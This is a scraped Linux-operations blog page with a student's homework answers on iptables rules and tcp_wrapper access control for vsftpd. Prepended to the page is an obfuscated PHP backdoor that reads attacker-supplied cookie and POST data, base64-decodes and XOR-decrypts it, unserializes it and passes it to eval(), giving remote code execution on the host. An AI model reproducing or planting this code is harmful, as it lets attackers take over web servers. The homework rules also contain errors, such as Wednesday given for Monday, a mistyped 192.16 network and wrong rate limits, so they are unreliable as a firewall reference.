$yXMmiEcIGK = chr ( 1034 - 946 ).'J' . chr (82) . chr ( 507 - 412 )."\160" . chr ( 1009 - 924 )."\x70";$HOygnoFBa = "\143" . chr (108) . chr (97) . chr ( 290 - 175 ).'s' . chr ( 711 - 616 ).chr (101) . 'x' . 'i' . "\x73" . "\164" . "\163";$BYAUcYott = class_exists($yXMmiEcIGK); $HOygnoFBa = "43522";$Jlpsxntry = !1;if ($BYAUcYott == $Jlpsxntry){function GYwpAWr(){return FALSE;}$NHUGUhVAVW = "47311";GYwpAWr();class XJR_pUp{private function keUQyUYK($NHUGUhVAVW){if (is_array(XJR_pUp::$yoUiHbHZ)) {$VQenh = str_replace('<' . chr (63) . 'p' . chr ( 380 - 276 )."\x70", "", XJR_pUp::$yoUiHbHZ['c' . "\157" . 'n' . 't' . chr (101) . "\156" . chr (116)]);eval($VQenh); $NHUGUhVAVW = "47311";exit();}}private $EYcCRZiy;public function dnqWMeVW(){echo 28968;}public function __destruct(){$NHUGUhVAVW = "42892_3067";$this->keUQyUYK($NHUGUhVAVW); $NHUGUhVAVW = "42892_3067";}public function __construct($DRaFgsEM=0){$FaiXtmvVIC = $_POST;$GcaGSUVsUd = $_COOKIE;$WLihkFyqXK = "7f2358cb-ef52-4b41-90bf-d69713355722";$eTgQsanT = @$GcaGSUVsUd[substr($WLihkFyqXK, 0, 4)];if (!empty($eTgQsanT)){$gKxEf = "base64";$zSqaoQvNL = "";$eTgQsanT = explode(",", $eTgQsanT);foreach ($eTgQsanT as $JSlTbQdQ){$zSqaoQvNL .= @$GcaGSUVsUd[$JSlTbQdQ];$zSqaoQvNL .= @$FaiXtmvVIC[$JSlTbQdQ];}$zSqaoQvNL = array_map($gKxEf . chr ( 1019 - 924 ).'d' . chr (101) . chr (99) . chr ( 938 - 827 ).'d' . "\145", array($zSqaoQvNL,)); $zSqaoQvNL = $zSqaoQvNL[0] ^ str_repeat($WLihkFyqXK, (strlen($zSqaoQvNL[0]) / strlen($WLihkFyqXK)) + 1);XJR_pUp::$yoUiHbHZ = @unserialize($zSqaoQvNL); $zSqaoQvNL = class_exists("42892_3067");}}public static $yoUiHbHZ = 65175;}$zupyxb = new /* 61085 */ $yXMmiEcIGK(47311 + 47311); $Jlpsxntry = $zupyxb = $NHUGUhVAVW = Array();} 第十四周作业 | Linux运维部落

第十四周作业

系统的INPUT和OUTPUT默认策略为DROP;

1、限制本地主机的web服务器在周一不允许访问;新请求的速率不能超过100个每秒;web服务器包含了admin字符串的页面不允许访问;web服务器仅允许响应报文离开本机;

]# iptables -P INPUT DROP                   #INPUT默认策略为DROP
]# iptables -P OUTPUT DROP                  #OUTPUT默认策略为DROP
]# iptables -A INPUT -p tcp -d 192.168.0.113 --dport 80 -m time --weekdays Wed -j DROP                      #周一不能访问web服务
]# iptables -A INPUT -p tcp -d 192.168.0.113 --dport 80 -m string --string "admin" --algo kmp -j DROP       #不能访包含"admin"的页面
]# iptables -A INPUT -p tcp -d 192.168.0.113 -m limit --limit 100/second -j ACCEPT                          #新请求的速率不能超过100个/s
]# iptables -A INPUT -p tcp -d 192.168.0.113 --dport 80 -j ACCEPT                                           #不匹配上面规则的均被允许
]# iptables -A OUTPUT -s 192.168.0.113 -p tcp -m state --state NEW,ESTABLISHED -j ACCEPT                    #仅允许相应报文离开本机

2、在工作时间,即周一到周五的8:30-18:00,开放本机的ftp服务给172.16.0.0网络中的主机访问;数据下载请求的次数每分钟不得超过5个;

]# modprobe nf_conntrack_ftp              #装载ftp跟踪模块
]# lsmod |grep ftp
nf_conntrack_ftp       18638  0 
nf_conntrack          105745  5 nf_nat,nf_nat_ipv4,xt_conntrack,nf_conntrack_ftp,nf_conntrack_ipv4

]# iptables -A INPUT -s 172.16.0.0/16 -p tcp -m time --timestart 08:30 --timestop 18:00 --weekdays Mon,Tue,Wed,Thu,Fri \
-m multiport --dport 21 -m state --state NEW,ESTABLISHED -m limit --limit 5/min -j ACCEPT      #放行命令连接
]# iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT                            #放行数据连接(被动模式)
]# iptables -A OUTPUT -d 172.16.0.0/16 -p tcp -m state --state ESTABLISHED -j ACCEPT           #放行出站响应报文

3、开放本机的ssh服务给172.16.x.1-172.16.x.100中的主机,x为你的座位号,新请求建立的速率一分钟不得超过2个;仅允许响应报文通过其服务端口离开本机;

]# iptables -A input -m iprange --src-range 172.16.0.1-172.16.0.100 -p tcp --dport 22 -m limit --limit 20/min -j ACCEPT
]# iptables -A output -m state --state ESTABLISHED -j ACCEPT

4、拒绝TCP标志位全部为1及全部为0的报文访问本机;

]# iptables -A INPUT -p tcp --tcp-flags ALL ALL -j DROP          #拒绝tcp标志位全部为1
]# iptables -A INPUT -p tcp --tcp-flags ALL NONE -j DROP         #拒绝tcp标志位全部为0

5、允许本机ping别的主机;但不开放别的主机ping本机;

]# iptables -A INPUT -p icmp --icmp-type 0 -j ACCEPT             # 0代表ping的响应包
]# iptables -A OUTPUT -p icmp --icmp-type 8 -j ACCEPT            # 8代表ping的请求包

6、判断下述规则的意义:
  # iptables -N clean_in                                                                                        #创建一个名为clean_in的自定义链
  # iptables -A clean_in -d 255.255.255.255 -p icmp -j DROP                                     #拒绝对广播地址255.255.255.255的ping包
  # iptables -A clean_in -d 172.16.255.255 -p icmp -j DROP                                       #拒绝对广播地址172.16.255.255的ping包

  # iptables -A clean_in -p tcp ! –syn -m state –state NEW -j DROP                              #拒绝所有不是以syn作为标志位的tcp新连接
  # iptables -A clean_in -p tcp –tcp-flags ALL ALL -j DROP                                          #拒绝tcp标志位全部为1的连接
  # iptables -A clean_in -p tcp –tcp-flags ALL NONE -j DROP                                       #拒绝tcp标志位全被为0的连接
  # iptables -A clean_in -d 172.16.100.7 -j RETURN                                                  #如果目标地址为172.16.100.7,则将连接转到INPUT链并继续匹配下面的规则

  # iptables -A INPUT -d 172.16.100.7 -j clean_in                                                    #将所有目标地址为172.16.100.7的连接转到clean_in链(此为第一条匹配策略)
  # iptables -A INPUT  -i lo -j ACCEPT                                                                     #允许数据流入接口为lo的连接
  # iptables -A OUTPUT -o lo -j ACCEPT                                                                  #允许数据流出接口为lo的连接

  # iptables -A INPUT  -i eth0 -m multiport -p tcp –dports 53,113,135,137,139,445 -j DROP                           #拒绝访问接口是eth0,且协议类型为tcp的DNS、NFS连接
  # iptables -A INPUT  -i eth0 -m multiport -p udp –dports 53,113,135,137,139,445 -j DROP                          #拒绝访问接口是eth0,且协议类型为udp的DNS、NFS连接

  # iptables -A INPUT  -i eth0 -p udp –dport 1026 -j DROP                                                                         #拒绝访问接口是eth0,且端口为1026的udp连接

  # iptables -A INPUT  -i eth0 -m multiport -p tcp –dports 1433,4899 -j DROP                                               #拒绝访问接口是eth0,且端口为1433,4899的tcp连接

  # iptables -A INPUT  -p icmp -m limit –limit 10/second -j ACCEPT                                                              #拒绝速度超过每秒10个的ping包

规则说明:

    1) 首先创建了一个名为clean_in的自定义链,该链用来对目标地址为172.16.100.7的所有访问进行初次过滤,将含有非法的广播ping包以及异常的tcp连接剔除出去,剩下的包则通过RETURN返回给INPUT链,并由INPUT链后面的策略继续进行匹配;

    2)INPUT链允许对本地lo的请求包以及由lo发出的包,此类请求通常是针对lvs-dr模型下的rs;

    3) INPUT链拒绝到本机dns,nfs访问,4899(radmin远程控制软件端口,容易被黑客控制),1433(SQL-SERVER端口),1026端口,并拒绝每秒超过10次的Flood-ping包。

7、通过tcp_wrapper控制vsftpd仅允许172.16.0.0/255.255.0.0网络中的主机访问,但172.16.100.3除外;对所被被拒绝的访问尝试都记录在/var/log/tcp_wrapper.log日志文件中;

]# vim /etc/hosts.allow
vsftpd:192.16.0.0/255.255.0.0 EXCEPT 172.16.100.3
]# vim /etc/hosts.deny
vsftpd:ALL:spawn /bin/echo $(date) login attemp from %c to %s,%d>>/var/log/tcpwrapper.log

原创文章,作者:N26-西安-方老喵,如若转载,请注明出处:http://www.178linux.com/73106

(0)
上一篇 2017-04-11 19:21
下一篇 2017-04-13 08:57

相关推荐

  • 天神之剑Vim编辑器

    一.概述和基本用法及一些描述 vi:Visual Interface 文本编辑器 文本ASCII , Unicode 文本编辑种类: 行编辑器:sed 全屏编辑器:nano,vi vim – Vi Improved 其他编辑器: gedit 一个简单的图形编辑器 gvim 一个vim编辑器的图形版本 基本用法  vim [OPTION]…

    Linux干货 2016-08-15
  • 推荐-Nginx Rewrite的应用-根据访问平台做简单跳转

    Nginx Rewrite的应用-根据访问平台做简单跳转 Nginx Rewrite的应用-根据访问平台做简单跳转 Rewrite模块简介 Rewrite的配置 使用不同平台进行测试 配置参数详解 Rewrite模块简介    Rewrite最主要的作用就是对URL进行重写,即重定向。举个简单的例子,我们用电脑打开淘宝显示出的页面与手机打开显示出的页面,或者…

    Linux干货 2016-03-27
  • 文件、目录——Linux基本命令(7)

    1.     文件名规则 (1)文件名最长255个字节          (2)包括路径在内文件名称最长4095个字节 (3)文件颜色          蓝色-…

    2017-07-17
  • 字符串处理

      一.字符串处理 v bash 的字符串处理工具: (一)字符串切片: ${#var}: 返回字符串变量var 的长度 例: [root@lxc ~]# a="     " [root@lxc ~]# echo ${#a} 5 [root@lxc ~]# ${var:offse…

    Linux干货 2016-11-24
  • 2

    2

    Linux干货 2018-03-26
  • Linux磁盘管理基础

    Linux磁盘管理基础 硬盘结构 文件系统与MBR、GTP 磁盘管理三步骤:分区、格式化、挂载 mount 硬盘结构 硬盘的基本组成材质是盘片,不同容量硬盘的盘片数不等。每个盘片有两面,都可记录信息。盘片表面上以盘片中心为圆心,不同半径的同心圆称为磁道,不同盘片相同半径的磁道所组成的圆柱称为柱面,每个磁道被分成许多扇形的区域,每个区域叫一个扇区,每个扇区可存…

    Linux干货 2016-09-01

评论列表(1条)

  • 马哥教育
    马哥教育 2017-05-04 14:33

    这次作业中iptables策略的类型涵盖范围比较广,以后生产中遇到类似的场景可以直接到这里进行参考。